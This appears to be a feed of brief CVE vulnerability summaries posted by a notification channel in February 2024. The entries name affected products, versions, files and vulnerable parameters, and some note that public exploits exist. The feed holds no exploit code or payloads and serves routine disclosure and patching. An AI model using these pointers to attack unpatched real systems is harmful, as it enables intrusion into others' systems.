🚨 CVE-2023-0687A vulnerability was found in GNU C Library 2.38. It has been declared as critical. This vulnerability affects the function __monstartup of the file gmon.c of the component Call Graph Monitor. The manipulation leads to buffer overflow. It is recommended to apply a patch to fix this issue. VDB-220246 is the identifier assigned to this vulnerability. NOTE: The real existence of this vulnerability is still doubted at the moment. The inputs that induce this vulnerability are basically addresses of the running application that is built with gmon enabled. It's basically trusted input or input that needs an actual security flaw to be compromised or controlled.🎖@cveNotify |
|
| 2024-02-14 18:07:37 |
🚨 CVE-2023-50868The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the "NSEC3" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations.🎖@cveNotify |
|
| 2024-02-14 18:07:30 |
🚨 CVE-2024-1262A vulnerability, which was classified as critical, has been found in Juanpao JPShop up to 1.5.02. This issue affects the function actionUpdate of the file /api/controllers/merchant/design/MaterialController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-253001 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-14 18:07:29 |
🚨 CVE-2024-24396Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the search bar component.🎖@cveNotify |
|
| 2024-02-14 17:07:55 |
🚨 CVE-2008-1526ZyXEL Prestige routers, including P-660, P-661, and P-662 models with firmware 3.40(PE9) and 3.40(AGD.2) through 3.40(AHQ.3), do not use a salt when calculating an MD5 password hash, which makes it easier for attackers to crack passwords.🎖@cveNotify |
|
| 2024-02-14 17:07:49 |
🚨 CVE-2005-4860Spectrum Cash Receipting System before 6.504 uses weak cryptography (static substitution) in the PASSFILE password file, which makes it easier for local users to gain privileges by decrypting a password.🎖@cveNotify |
|
| 2024-02-14 17:07:48 |
🚨 CVE-2004-2172EarlyImpact ProductCart uses a weak encryption scheme to encrypt passwords, which allows remote attackers to obtain the password via a chosen plaintext attack.🎖@cveNotify |
|
| 2024-02-14 17:07:47 |
🚨 CVE-2002-1753csNewsPro.cgi in CGIScript.net csNews Professional (csNewsPro) allows remote attackers to execute arbitrary Perl code via the setup parameter, which is processed by the Perl eval function.🎖@cveNotify |
|
| 2024-02-14 17:07:44 |
🚨 CVE-2002-1752csChatRBox.cgi in CGIScript.net csChat-R-Box allows remote attackers to execute arbitrary Perl code via the setup parameter, which is processed by the Perl eval function.🎖@cveNotify |
|
| 2024-02-14 17:07:43 |
🚨 CVE-2002-1682NewsReactor 1.0 uses a weak encryption scheme, which could allow local users to decrypt the passwords and gain access to other users' newsgroup accounts.🎖@cveNotify |
|
| 2024-02-14 17:07:42 |
🚨 CVE-2001-1546Pathways Homecare 6.5 uses weak encryption for user names and passwords, which allows local users to gain privileges by recovering the passwords from the pwhc.ini file.🎖@cveNotify |
|
| 2024-02-14 17:07:41 |
🚨 CVE-2001-0967Knox Arkeia server 4.2, and possibly other versions, uses a constant salt when encrypting passwords using the crypt() function, which makes it easier for an attacker to conduct brute force password guessing.🎖@cveNotify |
|
| 2024-02-14 16:07:52 |
🚨 CVE-2008-2433The web management console in Trend Micro OfficeScan 7.0 through 8.0, Worry-Free Business Security 5.0, and Client/Server/Messaging Suite 3.5 and 3.6 creates a random session token based only on the login time, which makes it easier for remote attackers to hijack sessions via brute-force attacks. NOTE: this can be leveraged for code execution through an unspecified "manipulation of the configuration."🎖@cveNotify |
|
| 2024-02-14 16:07:49 |
🚨 CVE-2005-3302Eval injection vulnerability in bvh_import.py in Blender 2.36 allows attackers to execute arbitrary Python code via a hierarchy element in a .bvh file, which is supplied to an eval function call.🎖@cveNotify |
|
| 2024-02-14 16:07:48 |
🚨 CVE-2005-1921Eval injection vulnerability in PEAR XML_RPC 1.3.0 and earlier (aka XML-RPC or xmlrpc) and PHPXMLRPC (aka XML-RPC For PHP or php-xmlrpc) 1.1 and earlier, as used in products such as (1) WordPress, (2) Serendipity, (3) Drupal, (4) egroupware, (5) MailWatch, (6) TikiWiki, (7) phpWebSite, (8) Ampache, and others, allows remote attackers to execute arbitrary PHP code via an XML file, which is not properly sanitized before being used in an eval statement.🎖@cveNotify |
|
| 2024-02-14 16:07:47 |
🚨 CVE-2002-1975Sharp Zaurus PDA SL-5000D and SL-5500 uses a salt of "A0" to encrypt the screen-locking password as stored in the Security.conf file, which makes it easier for local users to guess the password via brute force methods.🎖@cveNotify |
|
| 2024-02-14 16:07:43 |
🚨 CVE-2002-1872Microsoft SQL Server 6.0 through 2000, with SQL Authentication enabled, uses weak password encryption (XOR), which allows remote attackers to sniff and decrypt the password.🎖@cveNotify |
|
| 2024-02-14 16:07:42 |
🚨 CVE-2002-1697Electronic Code Book (ECB) mode in VTun 2.0 through 2.5 uses a weak encryption algorithm that produces the same ciphertext from the same plaintext blocks, which could allow remote attackers to gain sensitive information.🎖@cveNotify |
|
| 2024-02-14 00:37:32 |
🚨 CVE-2024-25140A default installation of RustDesk 1.2.3 on Windows places a WDKTestCert certificate under Trusted Root Certification Authorities with Enhanced Key Usage of Code Signing (1.3.6.1.5.5.7.3.3), valid from 2023 until 2033. This is potentially unwanted, e.g., because there is no public documentation of security measures for the private key, and arbitrary software could be signed if the private key were to be compromised. NOTE: the vendor's position is "we do not have EV cert, so we use test cert as a workaround." Insertion into Trusted Root Certification Authorities was the originally intended behavior, and the UI ensured that the certificate installation step (checked by default) was visible to the user before proceeding with the product installation.🎖@cveNotify |
|
| 2024-02-14 00:37:25 |
🚨 CVE-2023-36486The workflow-engine of ILIAS before 7.23 and 8 before 8.3 allows remote authenticated users to run arbitrary system commands on the application server as the application user by uploading a workflow definition file with a malicious filename.🎖@cveNotify |
|
| 2024-02-14 00:37:24 |
🚨 CVE-2023-36485The workflow-engine of ILIAS before 7.23 and 8 before 8.3 allows remote authenticated users to run arbitrary system commands on the application server as the application user via a malicious BPMN2 workflow definition file.🎖@cveNotify |
|
| 2024-02-13 23:37:32 |
🚨 CVE-2024-25121TYPO3 is an open source PHP based web content management system released under the GNU GPL. In affected versions of TYPO3 entities of the File Abstraction Layer (FAL) could be persisted directly via `DataHandler`. This allowed attackers to reference files in the fallback storage directly and retrieve their file names and contents. The fallback storage ("zero-storage") is used as a backward compatibility layer for files located outside properly configured file storages and within the public web root directory. Exploiting this vulnerability requires a valid backend user account. Users are advised to update to TYPO3 version 8.7.57 ELTS, 9.5.46 ELTS, 10.4.43 ELTS, 11.5.35 LTS, 12.4.11 LTS, or 13.0.1 which fix the problem described. When persisting entities of the File Abstraction Layer directly via DataHandler, `sys_file` entities are now denied by default, and `sys_file_reference` & `sys_file_metadata` entities are not permitted to reference files in the fallback storage anymore. When importing data from secure origins, this must be explicitly enabled in the corresponding DataHandler instance by using `$dataHandler->isImporting = true;`.🎖@cveNotify |
|
| 2024-02-13 23:37:26 |
🚨 CVE-2024-25120TYPO3 is an open source PHP based web content management system released under the GNU GPL. The TYPO3-specific `t3://` URI scheme could be used to access resources outside of the users' permission scope. This encompassed files, folders, pages, and records (although only if a valid link-handling configuration was provided). Exploiting this vulnerability requires a valid backend user account. Users are advised to update to TYPO3 versions 8.7.57 ELTS, 9.5.46 ELTS, 10.4.43 ELTS, 11.5.35 LTS, 12.4.11 LTS, 13.0.1 that fix the problem described. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2024-02-13 23:37:25 |
🚨 CVE-2023-38960Insecure Permissions issue in Raiden Professional Server RaidenFTPD v.2.4 build 4005 allows a local attacker to gain privileges and execute arbitrary code via crafted executable running from the installation directory.🎖@cveNotify |
|
| 2024-02-13 23:37:24 |
🚨 CVE-2023-31492Zoho ManageEngine ADManager Plus version 7182 and prior disclosed the default passwords for the account restoration of unauthorized domains to the authenticated users.🎖@cveNotify |
|
| 2024-02-13 23:07:32 |
🚨 CVE-2024-22433Dell Data Protection Search 19.2.0 and above contain an exposed password opportunity in plain text when using LdapSettings.get_ldap_info in DP Search. A remote unauthorized unauthenticated attacker could potentially exploit this vulnerability leading to a loss of Confidentiality, Integrity, Protection, and remote takeover of the system. This is a high-severity vulnerability as it allows an attacker to take complete control of DP Search to affect downstream protected devices.🎖@cveNotify |
|
| 2024-02-13 23:07:26 |
🚨 CVE-2023-52239The XML parser in Magic xpi Integration Platform 4.13.4 allows XXE attacks, e.g., via onItemImport.🎖@cveNotify |
|
| 2024-02-13 23:07:25 |
🚨 CVE-2024-24808pyLoad is an open-source Download Manager written in pure Python. There is an open redirect vulnerability due to incorrect validation of input values when redirecting users after login. pyLoad is validating URLs via the `get_redirect_url` function when redirecting users at login. This vulnerability has been patched with commit fe94451.🎖@cveNotify |
|
| 2024-02-13 23:07:24 |
🚨 CVE-2024-20826Implicit intent hijacking vulnerability in UPHelper library prior to version 4.0.0 allows local attackers to access sensitive information via implicit intent.🎖@cveNotify |
|
| 2024-02-13 22:37:32 |
🚨 CVE-2023-6152A user changing their email after signing up and verifying it can change it without verification in profile settings.The configuration option "verify_email_enabled" will only validate email only on sign up.🎖@cveNotify |
|
| 2024-02-13 22:37:26 |
🚨 CVE-2024-22515Unrestricted File Upload vulnerability in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to upload arbitrary files via the upload audio component.🎖@cveNotify |
|
| 2024-02-13 22:37:25 |
🚨 CVE-2023-6831Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.🎖@cveNotify |
|
| 2024-02-13 22:37:24 |
🚨 CVE-2023-31426The Brocade Fabric OS Commands “configupload” and “configdownload” before Brocade Fabric OS v9.1.1c, v8.2.3d, v9.2.0 print scp, sftp, ftp servers passwords in supportsave. This could allow a remote authenticated attacker to access sensitive information.🎖@cveNotify |
|
| 2024-02-13 22:07:26 |
🚨 CVE-2024-1261A vulnerability classified as critical was found in Juanpao JPShop up to 1.5.02. This vulnerability affects the function actionIndex of the file /api/controllers/merchant/app/ComboController.php of the component API. The manipulation of the argument pic_url leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253000.🎖@cveNotify |
|
| 2024-02-13 22:07:25 |
🚨 CVE-2023-38579The cross-site request forgery token in the request may be predictable or easily guessable allowing attackers to craft a malicious request, which could be triggered by a victim unknowingly. In a successful CSRF attack, the attacker could lead the victim user to carry out an action unintentionally.🎖@cveNotify |
|
| 2024-02-13 22:07:24 |
🚨 CVE-2024-1259A vulnerability was found in Juanpao JPShop up to 1.5.02. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/controllers/admin/app/AppController.php of the component API. The manipulation of the argument app_pic_url leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252998 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-13 21:37:32 |
🚨 CVE-2024-24142Sourcecodester School Task Manager 1.0 allows SQL Injection via the 'subject' parameter.🎖@cveNotify |
|
| 2024-02-13 21:37:26 |
🚨 CVE-2024-1259A vulnerability was found in Juanpao JPShop up to 1.5.02. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/controllers/admin/app/AppController.php of the component API. The manipulation of the argument app_pic_url leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252998 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-13 21:37:25 |
🚨 CVE-2023-40545Authentication bypass when an OAuth2 Client is using client_secret_jwt as its authentication method on affected 11.3 versions via specially crafted requests.🎖@cveNotify |
|
| 2024-02-13 21:37:24 |
🚨 CVE-2020-36641A vulnerability classified as problematic was found in gturri aXMLRPC up to 1.12.0. This vulnerability affects the function ResponseParser of the file src/main/java/de/timroes/axmlrpc/ResponseParser.java. The manipulation leads to xml external entity reference. Upgrading to version 1.14.0 is able to address this issue. The patch is identified as 456752ebc1ef4c0db980cb5b01a0b3cd0a9e0bae. It is recommended to upgrade the affected component. VDB-217450 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-02-13 21:07:25 |
🚨 CVE-2024-20828Improper authorization verification vulnerability in Samsung Internet prior to version 24.0 allows physical attackers to access files downloaded in SecretMode without proper authentication.🎖@cveNotify |
|
| 2024-02-13 21:07:24 |
🚨 CVE-2004-2252The firewall in Astaro Security Linux before 4.024 sends responses to SYN-FIN packets, which makes it easier for remote attackers to obtain information about the system and construct specialized attacks.🎖@cveNotify |
|
| 2024-02-13 20:37:44 |
🚨 CVE-2023-20526Insufficient input validation in the ASP Bootloader may enable a privileged attacker with physical access to expose the contents of ASP memory potentially leading to a loss of confidentiality.🎖@cveNotify |
|
| 2024-02-13 20:37:43 |
🚨 CVE-2022-23830SMM configuration may not be immutable, as intended, when SNP is enabled resulting in a potential limited loss of guest memory integrity.🎖@cveNotify |
|
| 2024-02-13 20:37:38 |
🚨 CVE-2022-23820Failure to validate the AMD SMM communication buffermay allow an attacker to corrupt the SMRAM potentially leading to arbitrarycode execution.🎖@cveNotify |
|
| 2024-02-13 20:37:37 |
🚨 CVE-2021-26345Failure to validate the value in APCB may allow a privileged attacker to tamper with the APCB token to force an out-of-bounds memory read potentially resulting in a denial of service.🎖@cveNotify |
|
| 2024-02-13 20:37:32 |
🚨 CVE-2022-43702When the directory containing the installer does not have sufficiently restrictive file permissions, an attacker can modify (or replace) the installer to execute malicious code.🎖@cveNotify |
|
| 2024-02-13 20:37:31 |
🚨 CVE-2021-46762Insufficient input validation in the SMU mayallow an attacker to corrupt SMU SRAM potentially leading to a loss ofintegrity or denial of service.🎖@cveNotify |
|
| 2024-02-13 20:37:26 |
🚨 CVE-2021-26392Insufficient verification of missing size check in 'LoadModule' may lead to an out-of-bounds write potentially allowing an attacker with privileges to gain code execution of the OS/kernel by loading a malicious TA.🎖@cveNotify |
|
| 2024-02-13 20:07:32 |
🚨 CVE-2023-51504Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dan Dulaney Dan's Embedder for Google Calendar allows Stored XSS.This issue affects Dan's Embedder for Google Calendar: from n/a through 1.2.🎖@cveNotify |
|
| 2024-02-13 20:07:26 |
🚨 CVE-2023-48645An issue was discovered in the Archibus app 4.0.3 for iOS. It uses a local database that is synchronized with a Web central server instance every time the application is opened, or when the refresh button is used. There is a SQL injection in the search work request feature in the Maintenance module of the app. This allows performing queries on the local database.🎖@cveNotify |
|
| 2024-02-13 20:07:25 |
🚨 CVE-2004-1428ArGoSoft FTP before 1.4.2.1 generates an error message if the user name does not exist instead of prompting for a password, which allows remote attackers to determine valid usernames.🎖@cveNotify |
|
| 2024-02-13 19:37:32 |
🚨 CVE-2024-0628The WP RSS Aggregator plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.23.5 via the RSS feed source in admin settings. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.🎖@cveNotify |
|
| 2024-02-13 19:37:26 |
🚨 CVE-2024-0849Leanote version 2.7.0 allows obtaining arbitrary local files. This is possiblebecause the application is vulnerable to LFR.🎖@cveNotify |
|
| 2024-02-13 19:37:25 |
🚨 CVE-2023-2804A heap-based buffer overflow issue was discovered in libjpeg-turbo in h2v2_merged_upsample_internal() function of jdmrgext.c file. The vulnerability can only be exploited with 12-bit data precision for which the range of the sample data type exceeds the valid sample range, hence, an attacker could craft a 12-bit lossless JPEG image that contains out-of-range 12-bit samples. An application attempting to decompress such image using merged upsampling would lead to segmentation fault or buffer overflows, causing an application to crash.🎖@cveNotify |
|
| 2024-02-13 19:37:24 |
🚨 CVE-2022-45146An issue was discovered in the FIPS Java API of Bouncy Castle BC-FJA before 1.0.2.4. Changes to the JVM garbage collector in Java 13 and later trigger an issue in the BC-FJA FIPS modules where it is possible for temporary keys used by the module to be zeroed out while still in use by the module, resulting in errors or potential information loss. NOTE: FIPS compliant users are unaffected because the FIPS certification is only for Java 7, 8, and 11.🎖@cveNotify |
|
| 2024-02-13 19:07:25 |
🚨 CVE-2024-0221The Photo Gallery by 10Web – Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.8.19 via the rename_item function. This makes it possible for authenticated attackers to rename arbitrary files on the server. This can lead to site takeovers if the wp-config.php file of a site can be renamed. By default this can be exploited by administrators only. In the premium version of the plugin, administrators can give gallery management permissions to lower level users, which might make this exploitable by users as low as contributors.🎖@cveNotify |
|
| 2024-02-13 19:07:24 |
🚨 CVE-2023-7029The WordPress Button Plugin MaxButtons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including 9.7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability was partially fixed in version 9.7.6.🎖@cveNotify |
|
| 2024-02-13 18:37:38 |
🚨 CVE-2023-47022Insecure Direct Object Reference in NCR Terminal Handler v.1.5.1 allows an unprivileged user to edit the audit logs for any user and can lead to CSV injection.🎖@cveNotify |
|
| 2024-02-13 18:37:31 |
🚨 CVE-2023-46360Hardy Barth cPH2 eCharge Ladestation v1.87.0 and earlier is vulnerable to Execution with Unnecessary Privileges.🎖@cveNotify |
|
| 2024-02-13 18:37:30 |
🚨 CVE-2024-0448The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget URL parameters in all versions up to, and including, 8.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-02-13 18:37:26 |
🚨 CVE-2023-6985The 10Web AI Assistant – AI content writing assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site.🎖@cveNotify |
|
| 2024-02-13 18:37:25 |
🚨 CVE-2024-22202phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. phpMyFAQ's user removal page allows an attacker to spoof another user's detail, and in turn make a compelling phishing case for removing another user's account. The front-end of this page doesn't allow changing the form details, an attacker can utilize a proxy to intercept this request and submit other data. Upon submitting this form, an email is sent to the administrator informing them that this user wants to delete their account. An administrator has no way of telling the difference between the actual user wishing to delete their account or the attacker issuing this for an account they do not control. This issue has been patched in version 3.2.5.🎖@cveNotify |
|
| 2024-02-13 18:37:24 |
🚨 CVE-2024-23054An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution due to a package listed in ++plone++static/components not existing in the public package index (npm).🎖@cveNotify |
|
| 2024-02-13 18:07:32 |
🚨 CVE-2004-0121Argument injection vulnerability in Microsoft Outlook 2002 does not sufficiently filter parameters of mailto: URLs when using them as arguments when calling OUTLOOK.EXE, which allows remote attackers to use script code in the Local Machine zone and execute arbitrary programs.🎖@cveNotify |
|
| 2024-02-13 18:07:26 |
🚨 CVE-2003-1201ldbm_back_exop_passwd in the back-ldbm backend in passwd.c for OpenLDAP 2.1.12 and earlier, when the slap_passwd_parse function does not return LDAP_SUCCESS, attempts to free an uninitialized pointer, which allows remote attackers to cause a denial of service (segmentation fault).🎖@cveNotify |
|
| 2024-02-13 18:07:25 |
🚨 CVE-2001-0150Internet Explorer 5.5 and earlier executes Telnet sessions using command line arguments that are specified by the web site, which could allow remote attackers to execute arbitrary commands if the IE client is using the Telnet client provided in Services for Unix (SFU) 2.0, which creates session transcripts.🎖@cveNotify |
|
| 2024-02-13 18:07:24 |
🚨 CVE-1999-0113Some implementations of rlogin allow root access if given a -froot parameter.🎖@cveNotify |
|
| 2024-02-13 17:37:36 |
🚨 CVE-2024-0761The File Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.2.1 due to insufficient randomness in the backup filenames, which use a timestamp plus 4 random digits. This makes it possible for unauthenticated attackers, to extract sensitive data including site backups in configurations where the .htaccess file in the directory does not block access.🎖@cveNotify |
|
| 2024-02-13 17:37:33 |
🚨 CVE-2024-0709The Cryptocurrency Widgets – Price Ticker & Coins List plugin for WordPress is vulnerable to SQL Injection via the 'coinslist' parameter in versions 2.0 to 2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-02-13 17:37:32 |
🚨 CVE-2022-36436OSU Open Source Lab VNCAuthProxy through 1.1.1 is affected by an vncap/vnc/protocol.py VNCServerAuthenticator authentication-bypass vulnerability that could allow a malicious actor to gain unauthorized access to a VNC session or to disconnect a legitimate user from a VNC session. A remote attacker with network access to the proxy server could leverage this vulnerability to connect to VNC servers protected by the proxy server without providing any authentication credentials. Exploitation of this issue requires that the proxy server is currently accepting connections for the target VNC server.🎖@cveNotify |
|
| 2024-02-13 17:37:31 |
🚨 CVE-2022-30034Flower, a web UI for the Celery Python RPC framework, all versions as of 05-02-2022 is vulnerable to an OAuth authentication bypass. An attacker could then access the Flower API to discover and invoke arbitrary Celery RPC calls or deny service by shutting down Celery task nodes.🎖@cveNotify |
|
| 2024-02-13 17:37:27 |
🚨 CVE-2021-34523Microsoft Exchange Server Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-02-13 17:37:26 |
🚨 CVE-2020-0688A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka 'Microsoft Exchange Memory Corruption Vulnerability'.🎖@cveNotify |
|
| 2024-02-13 17:37:25 |
🚨 CVE-2017-14623In the ldap.v2 (aka go-ldap) package through 2.5.0 for Go, an attacker may be able to login with an empty password. This issue affects an application using this package if these conditions are met: (1) it relies only on the return error of the Bind function call to determine whether a user is authorized (i.e., a nil return value is interpreted as successful authorization) and (2) it is used with an LDAP server allowing unauthenticated bind.🎖@cveNotify |
|
| 2024-02-13 17:37:24 |
🚨 CVE-2009-3421login.php in Zenas PaoBacheca Guestbook 2.1, when register_globals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the login_ok parameter to 1.🎖@cveNotify |
|
| 2024-02-13 17:07:32 |
🚨 CVE-2008-1160ZyXEL ZyWALL 1050 has a hard-coded password for the Quagga and Zebra processes that is not changed when it is set by a user, which allows remote attackers to gain privileges.🎖@cveNotify |
|
| 2024-02-13 17:07:25 |
🚨 CVE-2005-0496Arkeia Network Backup Client 5.x contains hard-coded credentials that effectively serve as a back door, which allows remote attackers to access the file system and possibly execute arbitrary commands.🎖@cveNotify |
|
| 2024-02-13 17:07:24 |
🚨 CVE-2003-0377SQL injection vulnerability in the web-based administration interface for iisPROTECT 2.2-r4, and possibly earlier versions, allows remote attackers to insert arbitrary SQL and execute code via certain variables, as demonstrated using the GroupName variable in SiteAdmin.ASP.🎖@cveNotify |
|
| 2024-02-13 16:37:43 |
🚨 CVE-2022-29959Emerson OpenBSI through 2022-04-29 mishandles credential storage. It is an engineering environment for the ControlWave and Bristol Babcock line of RTUs. This environment provides access control functionality through user authentication and privilege management. The credentials for various users are stored insecurely in the SecUsers.ini file by using a simple string transformation rather than a cryptographic mechanism.🎖@cveNotify |
|
| 2024-02-13 16:37:42 |
🚨 CVE-2022-30271The Motorola ACE1000 RTU through 2022-05-02 ships with a hardcoded SSH private key and initialization scripts (such as /etc/init.d/sshd_service) only generate a new key if no private-key file exists. Thus, this hardcoded key is likely to be used by default.🎖@cveNotify |
|
| 2024-02-13 16:37:38 |
🚨 CVE-2009-2272The Huawei D100 stores the administrator's account name and password in cleartext in a cookie, which allows context-dependent attackers to obtain sensitive information by (1) reading a cookie file, by (2) sniffing the network for HTTP headers, and possibly by using unspecified other vectors.🎖@cveNotify |
|
| 2024-02-13 16:37:37 |
🚨 CVE-2008-1440Microsoft Windows XP SP2 and SP3, and Server 2003 SP1 and SP2, does not properly validate the option length field in Pragmatic General Multicast (PGM) packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted PGM packet, aka the "PGM Invalid Length Vulnerability."🎖@cveNotify |
|
| 2024-02-13 16:37:36 |
🚨 CVE-2005-2209Capturix ScanShare 1.06 build 50 stores sensitive information such as the password in cleartext in capturixss_cfg.ini, which is readable by local users.🎖@cveNotify |
|
| 2024-02-13 16:37:31 |
🚨 CVE-2005-1894Direct code injection vulnerability in FlatNuke 2.5.3 allows remote attackers to execute arbitrary PHP code by placing the code into the Referer header of an HTTP request, which causes the code to be injected into referer.php, which can then be accessed by the attacker.🎖@cveNotify |
|
| 2024-02-13 16:37:30 |
🚨 CVE-2005-1828D-Link DSL-504T stores usernames and passwords in cleartext in the router configuration file, which allows remote attackers to obtain sensitive information.🎖@cveNotify |
|
| 2024-02-13 16:07:31 |
🚨 CVE-2022-30314Honeywell Experion PKS Safety Manager 5.02 uses Hard-coded Credentials. According to FSCT-2022-0052, there is a Honeywell Experion PKS Safety Manager hardcoded credentials issue. The affected components are characterized as: POLO bootloader. The potential impact is: Manipulate firmware. The Honeywell Experion PKS Safety Manager utilizes the DCOM-232/485 serial interface for firmware management purposes. When booting, the Safety Manager exposes the Enea POLO bootloader via this interface. Access to the boot configuration is controlled by means of credentials hardcoded in the Safety Manager firmware. The credentials for the bootloader are hardcoded in the firmware. An attacker with access to the serial interface (either through physical access, a compromised EWS or an exposed serial-to-ethernet gateway) can utilize these credentials to control the boot process and manipulate the unauthenticated firmware image (see FSCT-2022-0054).🎖@cveNotify |
|
| 2024-02-13 16:07:30 |
🚨 CVE-2022-29953The Bently Nevada 3700 series of condition monitoring equipment through 2022-04-29 has a maintenance interface on port 4001/TCP with undocumented, hardcoded credentials. An attacker capable of connecting to this interface can thus trivially take over its functionality.🎖@cveNotify |
|
| 2024-02-13 16:07:29 |
🚨 CVE-2022-30997Use of hard-coded credentials vulnerability exists in STARDOM FCN Controller and FCJ Controller R4.10 to R4.31, which may allow an attacker with an administrative privilege to read/change configuration settings or update the controller with tampered firmware.🎖@cveNotify |
|
| 2024-02-13 15:37:26 |
🚨 CVE-2023-4408The DNS message parsing code in `named` includes a section whose computational complexity is overly high. It does not cause problems for typical DNS traffic, but crafted queries and responses may cause excessive CPU load on the affected `named` instance by exploiting this flaw. This issue affects both authoritative servers and recursive resolvers.This issue affects BIND 9 versions 9.0.0 through 9.16.45, 9.18.0 through 9.18.21, 9.19.0 through 9.19.19, 9.9.3-S1 through 9.11.37-S1, 9.16.8-S1 through 9.16.45-S1, and 9.18.11-S1 through 9.18.21-S1.🎖@cveNotify |
|
| 2024-02-13 15:37:25 |
🚨 CVE-2023-6989The Shield Security – Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.🎖@cveNotify |
|
| 2024-02-13 15:37:24 |
🚨 CVE-2023-6982The Display custom fields in the frontend – Post and User Profile Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode and postmeta in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-02-13 15:27:12 |
https://t.me/malwr |
|
| 2024-02-13 15:07:24 |
🚨 CVE-2023-22819An uncontrolled resource consumption vulnerability issue that could arise by sending crafted requests to a service to consume a large amount of memory, eventually resulting in the service being stopped and restarted was discovered in Western Digital My Cloud Home, My Cloud Home Duo, SanDisk ibi and Western Digital My Cloud OS 5 devices. This issue requires the attacker to already have root privileges in order to exploit this vulnerability. This issue affects My Cloud Home and My Cloud Home Duo: before 9.5.1-104; ibi: before 9.5.1-104; My Cloud OS 5: before 5.27.161.🎖@cveNotify |
|
| 2024-02-13 14:07:31 |
🚨 CVE-2024-1459A path traversal vulnerability was found in Undertow. This issue may allow a remote attacker to append a specially-crafted sequence to an HTTP request for an application deployed to JBoss EAP, which may permit access to privileged or restricted files and directories.🎖@cveNotify |
|
| 2024-02-13 14:07:30 |
🚨 CVE-2024-1208The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.🎖@cveNotify |
|
| 2024-02-13 14:07:26 |
🚨 CVE-2024-0660The Formidable Forms – Contact Form, Survey, Quiz, Payment, Calculator Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.7.2. This is due to missing or incorrect nonce validation on the update_settings function. This makes it possible for unauthenticated attackers to change form settings and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-02-13 14:07:25 |
🚨 CVE-2024-0585The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery widget in all versions up to, and including, 5.9.4 due to insufficient input sanitization and output escaping on the Image URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-02-13 10:37:26 |
🚨 CVE-2024-1159The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.8.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
